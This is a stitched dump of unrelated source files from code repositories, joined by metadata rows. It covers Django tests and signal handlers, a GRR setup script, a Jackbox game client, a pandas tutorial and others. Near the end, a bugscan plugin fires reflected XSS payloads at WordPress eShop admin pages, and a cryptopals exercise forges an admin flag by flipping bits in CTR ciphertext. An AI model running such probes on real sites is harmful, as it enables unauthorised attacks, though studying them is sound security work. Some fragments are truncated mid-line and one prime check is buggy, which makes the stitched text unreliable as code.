assert new_token.time_created == db_token["time_created"]
assert new_token.time_deleted == db_token["time_deleted"]
current_time = int(freeze_time.return_value)
assert new_token.time_created == current_time
assert not new_token.time_deleted
assert new_token.initiator_id == new_token.user_id
assert int(new_token.expires_at.timestamp()) \
== current_time + new_token.default_ttl
def test_create_token_different(configure_model):
user_id = pytest.faux.gen_uuid()
new_token1 = token.TokenModel.create(user_id)
new_token2 = token.TokenModel.create(user_id)
assert new_token1.expires_at == new_token2.expires_at
assert new_token1.version == new_token2.version
assert new_token1._id != new_token2._id
def test_token_api_specific_fields(configure_model):
new_token = token.TokenModel.create(pytest.faux.gen_uuid())
api = new_token.make_api_structure()
assert api == {
"id": str(new_token.model_id),
"model": token.TokenModel.MODEL_NAME,
"initiator_id": new_token.initiator_id,
"time_deleted": new_token.time_deleted,
"time_updated": new_token.time_created,
"version": new_token.version,
"data": {
"expires_at": int(new_token.expires_at.timestamp()),
"user": None
}
}
| [
"[email protected]"
] | |
1d6d4abe45b478740b0a9a93148f268895c3f441 | 20a0bd0a9675f52d4cbd100ee52f0f639fb552ef | /transit_odp/pipelines/receivers.py | 1a5817d416f6c9c4c2c8269a5f55a6e304ca1274 | [] | no_license | yx20och/bods | 2f7d70057ee9f21565df106ef28dc2c4687dfdc9 | 4e147829500a85dd1822e94a375f24e304f67a98 | refs/heads/main | 2023-08-02T21:23:06.066134 | 2021-10-06T16:49:43 | 2021-10-06T16:49:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,992 | py | import celery
from django.db import transaction
from django.dispatch import receiver
from transit_odp.data_quality.tasks import task_dqs_download, task_dqs_report_etl
from transit_odp.organisation.constants import FeedStatus
from transit_odp.organisation.models import DatasetRevision
from transit_odp.organisation.receivers import logger
from transit_odp.pipelines.models import DataQualityTask
from transit_odp.pipelines.signals import dataset_changed, dataset_etl, dqs_report_etl
from transit_odp.timetables.tasks import task_dataset_pipeline
@receiver(dataset_etl)
def dataset_etl_handler(sender, revision: DatasetRevision, **kwargs):
"""
    Listens on the dataset_etl signal and dispatches a Celery job to process the feed payload
    """
    logger.debug(f"dataset_etl_handler called for DatasetRevision {revision.id}")
if not revision.status == FeedStatus.pending.value:
revision.to_pending()
revision.save()
# Trigger task once transactions have been fully committed
transaction.on_commit(lambda: task_dataset_pipeline.delay(revision.id))
@receiver(dqs_report_etl)
def dqs_report_etl_handler(sender, task: DataQualityTask, **kwargs):
"""
Listens on the dqs_report_etl and dispatches a Celery job chain to
process the ready DQS report
"""
logger.debug(
f"dqs_report_etl_handler called for "
f"DataQualityTask(id={task.id}, task_id={task.task_id})"
)
# Chain Celery tasks: download the report and then run ETL pipeline
transaction.on_commit(
lambda: celery.chain(task_dqs_download.s(task.id), task_dqs_report_etl.s())()
)
@receiver(dataset_changed)
def dataset_changed_handler(sender, revision: DatasetRevision, **kwargs):
"""
    Listens on the dataset_changed signal and dispatches a Celery job to publish the revision
"""
logger.debug(f"dataset_changed called for DatasetRevision {revision.id}")
task_dataset_pipeline.apply_async(args=(revision.id,), kwargs={"do_publish": True})
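# Illustrative sketch (assumption, not part of the original module): these handlers
# fire when the corresponding Django signal is sent, e.g.
#
#   from transit_odp.pipelines.signals import dataset_etl
#   dataset_etl.send(sender=None, revision=revision)
#
# which routes through dataset_etl_handler above and schedules task_dataset_pipeline.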
| [
"[email protected]"
] | |
98f5ca074dd68ca76c524fdf9067f24985046436 | e262e64415335060868e9f7f73ab8701e3be2f7b | /.history/Test002/数据类型_20201205162829.py | 4ad60fe9cb60917905bd6b19edde771ad9404d47 | [] | no_license | Allison001/developer_test | 6e211f1e2bd4287ee26fd2b33baf1c6a8d80fc63 | b8e04b4b248b0c10a35e93128a5323165990052c | refs/heads/master | 2023-06-18T08:46:40.202383 | 2021-07-23T03:31:54 | 2021-07-23T03:31:54 | 322,807,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 231 | py | fruits = ['orange', 'apple', 'pear', 'banana', 'kiwi', 'apple', 'banana']
# print(fruits.count("apple"))
# a = fruits.index("banana",4)
# print(a)
# fruits.reverse()
# print(fruits)
# fruits.append("daka")
# print(fruits)
a= r | [
"[email protected]"
] | |
500721d9011e251f5c83a5f683e8b128ba5cca62 | 6c6cf32f72c33c78ce07771328f5368564ebde5c | /autox/process_data/feature_type_recognition.py | 302050a7b24e1e9654829b4b776cb113400dc69d | [
"Apache-2.0"
] | permissive | emg110/AutoX | 9f3fdce5602eef7e1dc8ec99e0e60c3236da43d1 | 26eb6bea33b8e8428ee1afcd4403ccae2948724e | refs/heads/master | 2023-07-27T20:43:32.818251 | 2021-09-10T11:10:12 | 2021-09-10T11:10:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,769 | py | import pandas as pd
import datetime
from autox.CONST import FEATURE_TYPE
# A datetime looks like: 2015-08-28 16:43:37.283
# A timestamp looks like: 1440751417.283
def detect_TIMESTAMP(df, col):
try:
ts_min = int(float(df.loc[~(df[col] == '') & (df[col].notnull()), col].min()))
ts_max = int(float(df.loc[~(df[col] == '') & (df[col].notnull()), col].max()))
datetime_min = datetime.datetime.utcfromtimestamp(ts_min).strftime('%Y-%m-%d %H:%M:%S')
datetime_max = datetime.datetime.utcfromtimestamp(ts_max).strftime('%Y-%m-%d %H:%M:%S')
if datetime_min > '2000-01-01 00:00:01' and datetime_max < '2030-01-01 00:00:01' and datetime_max > datetime_min:
return True
except:
return False
def detect_DATETIME(df, col):
is_DATETIME = False
if df[col].dtypes == 'object':
is_DATETIME = True
try:
pd.to_datetime(df[col])
except:
is_DATETIME = False
return is_DATETIME
def get_data_type(df, col):
if detect_DATETIME(df, col):
return FEATURE_TYPE['datetime']
if detect_TIMESTAMP(df, col):
return FEATURE_TYPE['timestamp']
if df[col].dtypes == object or df[col].dtypes == bool or str(df[col].dtypes) == 'category':
return FEATURE_TYPE['cat']
if 'int' in str(df[col].dtype) or 'float' in str(df[col].dtype):
return FEATURE_TYPE['num']
class Feature_type_recognition():
def __init__(self):
self.df = None
self.feature_type = None
def fit(self, df):
self.df = df
self.feature_type = {}
for col in self.df.columns:
cur_type = get_data_type(self.df, col)
self.feature_type[col] = cur_type
return self.feature_type
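# Illustrative usage sketch (assumption, not part of the original file):
#   ftr = Feature_type_recognition()
#   feature_types = ftr.fit(df)  # maps each column name to a FEATURE_TYPE value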
| [
"[email protected]"
] | |
801b1698f76fd72430f6d4989a09735ae2002cce | e3c8f786d09e311d6ea1cab50edde040bf1ea988 | /Incident-Response/Tools/grr/grr/core/setup.py | c626095353055c7ac3288b16e37e0f43901a514b | [
"MIT",
"Apache-2.0"
] | permissive | foss2cyber/Incident-Playbook | d1add8aec6e28a19e515754c6ce2e524d67f368e | a379a134c0c5af14df4ed2afa066c1626506b754 | refs/heads/main | 2023-06-07T09:16:27.876561 | 2021-07-07T03:48:54 | 2021-07-07T03:48:54 | 384,988,036 | 1 | 0 | MIT | 2021-07-11T15:45:31 | 2021-07-11T15:45:31 | null | UTF-8 | Python | false | false | 4,697 | py | #!/usr/bin/env python
"""Setup configuration for the python grr modules."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import configparser
import itertools
import os
import shutil
import subprocess
import sys
from setuptools import Extension
from setuptools import find_packages
from setuptools import setup
from setuptools.command.develop import develop
from setuptools.command.install import install
from setuptools.command.sdist import sdist
THIS_DIRECTORY = os.path.dirname(os.path.realpath(__file__))
os.chdir(THIS_DIRECTORY)
def find_data_files(source, ignore_dirs=None):
ignore_dirs = ignore_dirs or []
result = []
for directory, dirnames, files in os.walk(source):
dirnames[:] = [d for d in dirnames if d not in ignore_dirs]
files = [os.path.join(directory, x) for x in files]
result.append((directory, files))
return result
def sync_artifacts():
"""Sync the artifact repo with upstream for distribution."""
subprocess.check_call([sys.executable, "makefile.py"],
cwd="grr_response_core/artifacts")
def get_config():
"""Get INI parser with version.ini data."""
ini_path = os.path.join(THIS_DIRECTORY, "version.ini")
if not os.path.exists(ini_path):
ini_path = os.path.join(THIS_DIRECTORY, "../../version.ini")
if not os.path.exists(ini_path):
raise RuntimeError("Couldn't find version.ini")
config = configparser.ConfigParser()
config.read(ini_path)
return config
VERSION = get_config()
class Develop(develop):
def run(self):
sync_artifacts()
develop.run(self)
class Sdist(sdist):
"""Build sdist."""
# TODO: Option name must be a byte string in Python 2. Remove
# this call once support for Python 2 is dropped.
user_options = sdist.user_options + [
(str("no-sync-artifacts"), None,
"Don't sync the artifact repo. This is unnecessary for "
"clients and old client build OSes can't make the SSL connection."),
]
def initialize_options(self):
self.no_sync_artifacts = None
sdist.initialize_options(self)
def run(self):
if not self.no_sync_artifacts:
sync_artifacts()
sdist.run(self)
def make_release_tree(self, base_dir, files):
sdist.make_release_tree(self, base_dir, files)
sdist_version_ini = os.path.join(base_dir, "version.ini")
if os.path.exists(sdist_version_ini):
os.unlink(sdist_version_ini)
shutil.copy(
os.path.join(THIS_DIRECTORY, "../../version.ini"), sdist_version_ini)
data_files = list(
itertools.chain(
find_data_files("executables"),
find_data_files("install_data"),
find_data_files("scripts"),
find_data_files("grr_response_core/artifacts"),
# TODO: For some reason, this path cannot be unicode string
# or else installation fails for Python 2 (with "too many values to
# unpack" error). This call should be removed once support for Python 2
# is dropped.
[str("version.ini")],
))
setup_args = dict(
name="grr-response-core",
version=VERSION.get("Version", "packageversion"),
description="GRR Rapid Response",
license="Apache License, Version 2.0",
url="https://github.com/google/grr",
maintainer="GRR Development Team",
maintainer_email="[email protected]",
python_requires=">=3.6",
packages=find_packages(),
zip_safe=False,
include_package_data=True,
ext_modules=[
Extension(
# TODO: In Python 2, extension name and sources have to
# be of type `bytes`. These calls should be removed once support for
# Python 2 is dropped.
name=str("grr_response_core._semantic"),
sources=[str("accelerated/accelerated.c")])
],
cmdclass={
"develop": Develop,
"install": install,
"sdist": Sdist,
},
install_requires=[
# TODO: This should be 3.3.2, but AppVeyor has issues with
# that version.
"cryptography==2.9.2",
"distro==1.5.0",
"fleetspeak==0.1.9",
"grr-response-proto==%s" % VERSION.get("Version", "packagedepends"),
"ipaddr==2.2.0",
"ipython==7.15.0",
"pexpect==4.8.0",
"pip>=21.0.1",
"psutil==5.7.0",
"python-crontab==2.5.1",
"python-dateutil==2.8.1",
"pytsk3==20200117",
"pytz==2020.1",
"PyYAML==5.4.1",
"requests==2.25.1",
"yara-python==4.0.1",
],
# Data files used by GRR. Access these via the config_lib "resource" filter.
data_files=data_files)
setup(**setup_args)
| [
"[email protected]"
] | |
68f9071bc2d3e1d43621faf123d7dcbc6640e22f | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_294/ch31_2020_04_13_14_21_04_841403.py | bcd912b0ee45d59242beaa15252d42d13f62912d | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | def eh_primo (n):
if n == 0 or n == 1:
return False
elif n == 2:
return True
for i in range (3, n,2):
if (n%i ==0):
return False
elif (n%i == 0):
return False
else:
return True | [
"[email protected]"
] | |
b75873de168a812387237e063712ca12fa4a326b | eff7b3aae8b923ca1ca82bffcfb7327030fcfb08 | /4/4.26.py | d0448e0908a9773136139dfa98a9dbe1a1a13daf | [] | no_license | blegloannec/cryptopals | fec708c59caaa21ec2eeb47ed7dda7498a4c36b1 | 438bc0653981e59722a728c7232a1ea949e383ee | refs/heads/master | 2022-05-19T02:48:47.967056 | 2021-12-28T13:02:04 | 2022-03-07T17:02:40 | 143,565,339 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,589 | py | #!/usr/bin/env python3
# this is 2.16 (CBC bitflipping) for CTR, which is trivial
# as in CTR mode the plaintext is xored against the generated
# stream, hence it is directly vulnerable to bitflipping: any bit
# flipped in the ciphertext will be flipped in the decrypted text
from Cryptodome.Cipher import AES
from Cryptodome.Random import get_random_bytes
BS = 16
## SECRET DATA
PREF = b'comment1=cooking%20MCs;userdata='
SUFF = b';comment2=%20like%20a%20pound%20of%20bacon'
Key = get_random_bytes(BS)
Nonce = get_random_bytes(BS//2)
##
def encrypt(userdata: str) -> bytes:
userdata = userdata.replace(';','";"').replace('=','"="').encode()
data = PREF + userdata + SUFF
return AES.new(Key, AES.MODE_CTR, nonce=Nonce).encrypt(data)
# contrary to 2.16, here we can even decode the decrypted text without any problem!
TARGET = ';admin=true;'
def decrypt(ciph: bytes) -> bool:
data = AES.new(Key, AES.MODE_CTR, nonce=Nonce).decrypt(ciph).decode()
print(data)
return TARGET in data
if __name__=='__main__':
assert not decrypt(encrypt(TARGET))
# as in 2.16, we assume we already know BS and the prefix size
PREF_SIZE = len(PREF)
target = bytearray(TARGET.encode())
# we flip the parity bit of the filtered bytes of the target
flips = [i for i,c in enumerate(target) if c in b';=']
for b in flips:
target[b] ^= 1
target = target.decode()
ciph = encrypt(target)
    # and simply flip them back in the ciphertext to recover ';admin=true;' in the decrypted text
ciph = bytearray(ciph)
for b in flips:
ciph[PREF_SIZE+b] ^= 1
assert decrypt(ciph)
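    # This works because CTR decryption is ciphertext XOR keystream: flipping bit b
    # of the ciphertext flips exactly bit b of the plaintext, with no diffusion as in CBC.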
| [
"[email protected]"
] | |
ceb0496d20400be814da009ed346bfa457d2b81c | 8c8463413e92149ad0ff16eac0b09303ec18de99 | /ddt_python/ddt_container_nSvgTable.py | 49598644a372ca534c89455733b6531bc85f4502 | [
"MIT"
] | permissive | dmccloskey/ddt_python | 23d0d4d2193fe052545b890ef332056f869117cf | 60624701a01520db81c89b36be6af385a5274aba | refs/heads/master | 2021-01-19T02:01:57.769244 | 2016-12-02T01:21:11 | 2016-12-02T01:21:11 | 48,295,899 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,278 | py | from .ddt_container import ddt_container
from .ddt_tile import ddt_tile
from .ddt_tile_html import ddt_tile_html
class ddt_container_nSvgTable(ddt_container):
def make_nSvgTable(self,
data1,data2,
data1_keys,data1_nestkeys,data1_keymap,
data2_keys,data2_nestkeys,data2_keymap,
tileheader,
svgtype,
tabletype,
svgx1axislabel='',
svgy1axislabel='',
single_plot_I=True,
svgkeymap = [],
svgtile2datamap=[0],
svgfilters=None,
tablefilters=None,
tableheaders=None
):
'''Make a filter menu + n SVGs + Table
INPUT:
data1 = listDict of all data
        data2 = listDict of all data (a single plot with different data from data1, or a single plot with data1/2)
dictColumn of all data (dictionary of data split into different SVGs, required for multiple plots);
parameters for filtermenu and table
data1_keys
data1_nestkeys
data1_keymap
parameters for the svg objects
data2_keys
data2_nestkeys
data2_keymap
tileheader = title for each of the tiles
svgtype = type of svg (TODO: add optional input for specifying specific svgs for multiple plots)
tabletype = type of table
        single_plot_I = plot all data on a single svg or partition into separate SVGs
True, only data1 will be used
False, data2 must specified
OPTIONAL INPUT for single plot:
svgkeymap = default, [data2_keymap],
svgtile2datamap= default, [0],
'''
#make the form
form = ddt_tile();
form.make_tileparameters(
tileparameters={
'tileheader':'Filter menu',
'tiletype':'html',
'tileid':"filtermenu1",
'rowid':"row1",
'colid':"col1",
'tileclass':"panel panel-default",
'rowclass':"row",
'colclass':"col-sm-6"}
);
form.make_htmlparameters(
htmlparameters = {
'htmlid':'filtermenuform1',
"htmltype":'form_01',
"formsubmitbuttonidtext":{'id':'submit1','text':'submit'},
"formresetbuttonidtext":{'id':'reset1','text':'reset'},
"formupdatebuttonidtext":{'id':'update1','text':'update'}},
);
self.add_parameters(form.get_parameters());
self.update_tile2datamap("filtermenu1",[0]);
self.add_filtermenu(
{"filtermenuid":"filtermenu1",
"filtermenuhtmlid":"filtermenuform1",
"filtermenusubmitbuttonid":"submit1",
"filtermenuresetbuttonid":"reset1",
"filtermenuupdatebuttonid":"update1"}
);
# data 1:
self.add_data(
data1,
data1_keys,
data1_nestkeys
);
# tile 1-n features: count
if not single_plot_I:
rowcnt = 1;
colcnt = 1;
cnt = 0;
for k,v in data2.items():
svgtileid = "tilesvg"+str(cnt);
svgid = 'svg'+str(cnt);
iter=cnt+1; #start at 1
if (cnt % 2 == 0):
rowcnt = rowcnt+1;#even
colcnt = 1;
else:
colcnt = colcnt+1;
# svg
svg = ddt_tile();
svg.make_tileparameters(
tileparameters={
'tileheader':tileheader,
'tiletype':'svg',
'tileid':svgtileid,
'rowid':"row"+str(rowcnt),
'colid':"col"+str(colcnt),
'tileclass':"panel panel-default",
'rowclass':"row",
'colclass':"col-sm-6"
});
svg.make_svgparameters(
svgparameters={
"svgtype":svgtype,
"svgkeymap":[data2_keymap],
'svgid':'svg'+str(cnt),
"svgmargin":{ 'top': 50, 'right': 150, 'bottom': 50, 'left': 50 },
"svgwidth":500,
"svgheight":350,
"svgx1axislabel":data2_keymap['xdata'],
"svgy1axislabel":data2_keymap['ydata']
}
);
self.add_parameters(svg.get_parameters());
self.update_tile2datamap(svgtileid,[iter]);
self.add_data(
v,
data2_keys,
data2_nestkeys
);
cnt+=1;
else:
cnt = 0;
svgtileid = "tilesvg"+str(cnt);
svgid = 'svg'+str(cnt);
rowcnt = 2;
colcnt = 1;
# make the svg object
svg = ddt_tile();
svg.make_tileparameters(
tileparameters={
'tileheader':tileheader,
'tiletype':'svg',
'tileid':svgtileid,
'rowid':"row"+str(rowcnt),
'colid':"col"+str(colcnt),
'tileclass':"panel panel-default",
'rowclass':"row",
'colclass':"col-sm-6"
});
# make the svg parameters
if not svgkeymap:
svgkeymap = [data2_keymap];
svg.make_svgparameters(
svgparameters={
"svgtype":svgtype,
"svgkeymap":svgkeymap,
'svgid':svgid,
"svgmargin":{ 'top': 50, 'right': 150, 'bottom': 50, 'left': 50 },
"svgwidth":350,
"svgheight":250,
"svgx1axislabel":data2_keymap['xdata'],
"svgy1axislabel":data2_keymap['ydata']
}
);
self.add_parameters(svg.get_parameters());
self.update_tile2datamap(svgtileid,svgtile2datamap);
#add data 2
if data2:
self.add_data(
data2,
data2_keys,
data2_nestkeys
);
cnt+=1;
# make the table object
crosstable = ddt_tile();
crosstable.make_tileparameters(
tileparameters = {
'tileheader':'Table',
'tiletype':'table',
'tileid':"tabletile1",
'rowid':"row"+str(rowcnt+1),
'colid':"col1",
'tileclass':"panel panel-default",
'rowclass':"row",
'colclass':"col-sm-12"
}
);
crosstable.make_tableparameters(
tableparameters = {
"tabletype":tabletype,
'tableid':'table1',
"tablefilters":tablefilters,
"tableclass":"table table-condensed table-hover",
'tableformtileid':'tile1',
"tablekeymap":[data2_keymap],
"tableheaders":tableheaders,}
);
self.add_parameters(crosstable.get_parameters());
self.update_tile2datamap("tabletile1",[0]); | [
"[email protected]"
] | |
c98ea5753067696b58095c2bc6f8717a0a9e8274 | 47cde4a1cfbb05aa256064e03c6ab85650865ee4 | /jackbox/bombintern.py | 7663ac4f0a2d2322468e04115302cc8865952578 | [
"Apache-2.0"
] | permissive | Gorialis/jackbox.py | 54b5bbb25afd9233a594c6d1e861528b0dd3349e | 509bdab63a56114b2d5c8d1fe3220bc7f04ea834 | refs/heads/master | 2021-01-15T00:13:26.902245 | 2020-02-24T16:15:19 | 2020-02-24T16:15:19 | 242,808,186 | 0 | 0 | Apache-2.0 | 2020-02-24T18:13:48 | 2020-02-24T18:13:47 | null | UTF-8 | Python | false | false | 6,784 | py | """
/jackbox/bombintern.py
Copyright (c) 2020 ShineyDev
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from jackbox.client import Client
class BombCorpClient(Client):
async def add(self, ingredient: str):
"""
|coro|
Adds an ingredient to a ``CoffeeBomb``.
Parameters
----------
ingredient: :class:`str`
The ingredient to add.
"""
data = {
"args": [{
"action": "SendMessageToRoomOwner",
"appId": self._wss.app_id,
"message": {"add": True,
"ingredient": ingredient},
"roomId": self._wss.room_id,
"type": "Action",
"userId": self._wss.user_id,
}],
"name": "msg",
}
await self._wss._send(5, data)
async def brew(self):
"""
|coro|
Brews the ``CoffeeBomb``.
"""
data = {
"args": [{
"action": "SendMessageToRoomOwner",
"appId": self._wss.app_id,
"message": {"brew": True},
"roomId": self._wss.room_id,
"type": "Action",
"userId": self._wss.user_id,
}],
"name": "msg",
}
await self._wss._send(5, data)
async def cut(self, index: int):
"""
|coro|
Cuts a wire on a ``WiredBomb``.
Parameters
----------
index: :class:`int`
The index of the wire.
.. note::
Indexing starts at ``1``.
"""
data = {
"args": [{
"action": "SendMessageToRoomOwner",
"appId": self._wss.app_id,
"message": {"index": index},
"roomId": self._wss.room_id,
"type": "Action",
"userId": self._wss.user_id,
}],
"name": "msg",
}
await self._wss._send(5, data)
async def file(self, name: str):
"""
|coro|
Files a file on a ``FilingBomb``.
Parameters
----------
name: :class:`str`
The **full** name of the file.
"""
data = {
"args": [{
"action": "SendMessageToRoomOwner",
"appId": self._wss.app_id,
"message": {"file": name},
"roomId": self._wss.room_id,
"type": "Action",
"userId": self._wss.user_id,
}],
"name": "msg",
}
await self._wss._send(5, data)
async def menu(self):
"""
|coro|
Returns to the menu.
"""
data = {
"args": [{
"action": "SendMessageToRoomOwner",
"appId": self._wss.app_id,
"message": {"decision": "Gameover_Menu"},
"roomId": self._wss.room_id,
"type": "Action",
"userId": self._wss.user_id,
}],
"name": "msg",
}
await self._wss._send(5, data)
async def next_day(self):
"""
|coro|
Starts the next day.
"""
data = {
"args": [{
"action": "SendMessageToRoomOwner",
"appId": self._wss.app_id,
"message": {"decision": "Gameover_Continue"},
"roomId": self._wss.room_id,
"type": "Action",
"userId": self._wss.user_id,
}],
"name": "msg",
}
await self._wss._send(5, data)
async def press(self, index: int):
"""
|coro|
Presses a button on a ``CopierBomb`` or a ``KeypadBomb``.
Parameters
----------
index: :class:`int`
The index of the button.
.. note::
Indexing starts at ``1``.
"""
data = {
"args": [{
"action": "SendMessageToRoomOwner",
"appId": self._wss.app_id,
"message": {"index": index},
"roomId": self._wss.room_id,
"type": "Action",
"userId": self._wss.user_id,
}],
"name": "msg",
}
await self._wss._send(5, data)
async def remove(self, ingredient: str):
"""
|coro|
Removes an ingredient from a ``CoffeeBomb``.
Parameters
----------
ingredient: :class:`str`
The ingredient to remove.
"""
data = {
"args": [{
"action": "SendMessageToRoomOwner",
"appId": self._wss.app_id,
"message": {"remove": True,
"ingredient": ingredient},
"roomId": self._wss.room_id,
"type": "Action",
"userId": self._wss.user_id,
}],
"name": "msg",
}
await self._wss._send(5, data)
async def retry_day(self):
"""
|coro|
Retries the current day.
"""
data = {
"args": [{
"action": "SendMessageToRoomOwner",
"appId": self._wss.app_id,
"message": {"decision": "Gameover_Retry"},
"roomId": self._wss.room_id,
"type": "Action",
"userId": self._wss.user_id,
}],
"name": "msg",
}
await self._wss._send(5, data)
async def smash(self, name: str):
"""
|coro|
Smashes an object on a ``SmashPuzzle``.
Parameters
----------
name: :class:`str`
The name of the object.
"""
data = {
"args": [{
"action": "SendMessageToRoomOwner",
"appId": self._wss.app_id,
"message": {"object": name},
"roomId": self._wss.room_id,
"type": "Action",
"userId": self._wss.user_id,
}],
"name": "msg",
}
await self._wss._send(5, data)
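# A minimal, hypothetical usage sketch (the connection/join step is omitted
# because it depends on jackbox.client.Client; only the coroutines defined
# above are real). Each action must be awaited inside an event loop:
#
#   import asyncio
#
#   async def main():
#       client = BombCorpClient()
#       ...  # connect and join a Bomb Corp room first
#       await client.cut(1)    # cut the first wire on a WiredBomb
#       await client.press(3)  # press the third button on a KeypadBomb
#
#   asyncio.run(main())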
| [
"[email protected]"
] | |
633d077282121e7fe1fc26969cdcd75566891280 | c2773c3835ff5460c1fb80d604137274c9c6650f | /testing_app_hello_de_9234/urls.py | c44e8432154c596941c897e59e88734dba2f4836 | [] | no_license | crowdbotics-apps/testing-app-hello-de-9234 | 6311ddc71b9bb93bed6fb6f530bd74de39c889f5 | 846d7f1acfd5594b2578a6f15da8b551f2cf3abc | refs/heads/master | 2022-12-06T03:23:21.456801 | 2020-08-18T15:02:27 | 2020-08-18T15:02:27 | 288,486,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,975 | py | """testing_app_hello_de_9234 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from allauth.account.views import confirm_email
from rest_framework import permissions
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
urlpatterns = [
path("", include("home.urls")),
path("accounts/", include("allauth.urls")),
path("api/v1/", include("home.api.v1.urls")),
path("admin/", admin.site.urls),
path("users/", include("users.urls", namespace="users")),
path("rest-auth/", include("rest_auth.urls")),
# Override email confirm to use allauth's HTML view instead of rest_auth's API view
path("rest-auth/registration/account-confirm-email/<str:key>/", confirm_email),
path("rest-auth/registration/", include("rest_auth.registration.urls")),
]
admin.site.site_header = "testing app hello"
admin.site.site_title = "testing app hello Admin Portal"
admin.site.index_title = "testing app hello Admin"
# swagger
api_info = openapi.Info(
title="testing app hello API",
default_version="v1",
description="API documentation for testing app hello App",
)
schema_view = get_schema_view(
api_info,
public=True,
permission_classes=(permissions.IsAuthenticated,),
)
urlpatterns += [
path("api-docs/", schema_view.with_ui("swagger", cache_timeout=0), name="api_docs")
]
| [
"[email protected]"
] | |
03a090ef84ebad55c3aca6d91af5ba0140a7717e | 0d8ee78f61660343e5feec41a53269dbf5585fa3 | /Demo11/detect_nan.py | 17ba54a1b6bb67f238e3c1cd79adac06a036808d | [] | no_license | x-jeff/Python_Code_Demo | 41b033f089fa19d8c63b2f26bf66ef379738c4ad | 9bc458b08cfae0092e8f11a54031ca2e7017affc | refs/heads/master | 2023-07-29T16:34:34.222620 | 2023-07-09T10:38:23 | 2023-07-09T10:38:23 | 176,306,727 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,509 | py | import numpy as np
import pandas as pd
# Use np.nan to represent a missing value
print(np.nan)
# Build a small dataset that contains missing values
df=pd.DataFrame([["Tim","M",24,169,100],["Jack","M",np.nan,177,140],["Jessy","F",21,162,np.nan],["Mary","F",23,159,87]])
# Assign column names
df.columns=["Name","Gender","Age","Height","Weight"]
print(df)
# Check whether any missing values exist
# Check whether the 1st row contains a missing value
print(df.loc[0].isnull().values.any())  # False means the row has no missing value
print(df[0:1].isnull().values.any())  # an alternative way to check the 1st row
# Check whether the 3rd column contains a missing value
print(df["Age"].isnull().values.any())  # True means missing values exist
# Check whether the whole DataFrame contains any missing value
print(df.isnull().values.any())  # True means the DataFrame has missing values
# Find the exact positions of the missing values
# Locate the missing values in the 4th row
print(df.loc[3].isnull())  # True marks a missing value, False a non-missing one
print(df.loc[3].notnull())  # True marks a non-missing value, False a missing one
# Locate the missing values in the 5th column
print(df["Weight"].isnull())
print(df["Weight"].notnull())
# Locate missing values across the whole DataFrame
print(df.isnull())
print(df.notnull())
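# A small additional sketch (using the same df as above and only the numpy/pandas
# imports already present): np.where recovers the (row, column) coordinates of
# every missing value at once.
rows, cols = np.where(df.isnull())
print(list(zip(rows, cols)))  # expected: [(1, 2), (2, 4)] -> Jack's Age, Jessy's Weight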
# Check every column at once for missing values
print(df.isnull().any())
# Count the missing values
# Count the missing values in the 2nd row
print(df.loc[1].isnull().sum())
# Count the missing values in the 3rd column
print(df["Age"].isnull().sum())
# Count the missing values of the whole DataFrame
print(df.isnull().sum())  # per-column counts
print(df.isnull().sum().sum())  # total count | [
"[email protected]"
] | |
79ca884a8a20ea2993f277d5ff1ca22a268617bf | e0c8662a56d89730043146ddc340e9e0b9f7de72 | /plugin/1193d0d2-1596.py | 393dab9cbff6fc791ad1a466479311cea838e4a3 | [] | no_license | izj007/bugscan_poc | f2ef5903b30b15c230b292a1ff2dc6cea6836940 | 4490f3c36d4033bdef380577333722deed7bc758 | refs/heads/master | 2020-09-22T17:20:50.408078 | 2019-01-18T09:42:47 | 2019-01-18T09:42:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 953 | py | #coding:utf-8
from lib.curl import *
"""
POC Name : WordPress eShop Plugin 6.2.8 Multiple Cross Site Scripting Vulnerabilities
From : http://www.exploit-db.com/exploits/36038/
"""
def assign(service, arg):
if service == "wordpress":
return True, arg
def audit(arg):
payloads = ("wp-admin/admin.php?page=eshop-templates.php&eshoptemplate=%22%3E%3Cscript%3Ealert%28%2Fhello_topper%2f%29;%3C/script%3E",
"wp-admin/admin.php?page=eshop-orders.php&view=1&action=%22%3E%3Cscript%3Ealert%28%2Fhello_topper%2f%29;%3C/script%3E")
for payload in payloads:
target_url=arg + payload
code, head, res, errcode, _ = curl.curl(target_url)
if code == 200 and res.find('alert(/hello_topper/)') != -1:
security_info(target_url + ' WordPress eShop Reflected XSS')
if __name__ == '__main__':
import sys
from dummy import *
audit(assign('wordpress', 'http://www.example.com/')[1]) | [
"[email protected]"
] | |
4019557ed0cfcbf40d9968b2c7b943898e927a02 | 8b5d68c9398186cae64dbcc5b293d62d69e1921d | /src/python/knowledge_base/resolvers/external_uri_resolver.py | 04e75899a585cc5c3a751bae5e325ba7624f7e60 | [
"Apache-2.0"
